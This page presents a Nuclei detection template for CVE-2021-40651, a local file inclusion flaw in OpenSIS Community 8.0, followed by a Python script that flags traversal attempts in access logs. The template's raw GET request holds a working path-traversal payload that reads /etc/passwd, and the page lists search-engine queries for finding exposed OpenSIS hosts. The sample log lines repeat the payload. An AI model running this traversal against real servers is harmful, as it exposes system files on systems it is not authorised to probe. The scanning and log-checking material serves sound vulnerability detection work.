OS4Ed OpenSIS Community 8.0 - Local File Inclusion
ID: CVE-2021-40651
Severity: medium
Author: ctflearner
Tags: cve,cve2021,lfi,os4ed,opensis,authenticated
Description
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary files from the server’s filesystem as long as the application has access to the file.
YAML Source
id: CVE-2021-40651

info:
  name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
  reference:
    - https://www.exploit-db.com/exploits/50259
    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
    - https://www.youtube.com/watch?v=wFwlbXANRCo
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-40651
    cwe-id: CWE-22
    epss-score: 0.02562
    epss-percentile: 0.90208
    cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query:
      - "title:\"openSIS\""
      - http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2021,lfi,os4ed,opensis,authenticated

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
      - |
        GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(body_1, "openSIS")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502206e18e67bb9fe57de667588820bc2fd719d6646186b7a8b68b77fa0ae6392aa5a022100facc168371775ac3e92b7e91c974389d08689283be9f8fba102b7dadacdfdc7e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40651.yaml"
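
For the defender's side of the same check, the following added example (not part of the template or of OpenSIS) scans web server access logs for Modules.php requests whose modname value resolves outside the directory it is joined to, which is the CWE-22 condition the template's second request exercises. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration, and the traversal in the sample is shortened from the one in the template.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Client address, request target and status from a combined-format log line.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')


def modname_escapes_root(modname):
    """True if the decoded modname resolves outside the directory it is joined to."""
    path = modname.replace("\\", "/")
    if "\x00" in path or path.startswith("/"):
        return True
    # normpath collapses "Portal.php../.." style segments lexically.
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")


def suspicious_requests(log_lines):
    """Return (client, target, status) for Modules.php requests with a traversing modname."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/modules.php"):
            continue
        # parse_qs percent-decodes the value, so %2f arrives here as "/".
        values = parse_qs(parts.query, keep_blank_values=True).get("modname", [])
        if any(modname_escapes_root(v) for v in values):
            hits.append((client, target, int(status)))
    return hits


# Constructed sample log lines (documentation addresses, not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Modules.php?modname=miscellaneous/Portal.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Modules.php?modname=students/../miscellaneous/Portal.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1" 200 1843',
]

if __name__ == "__main__":
    for client, target, status in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} traversal in modname: {target}")
```

A flagged request that returned status 200 is the case to review first, since the template's matcher also requires a 200 response.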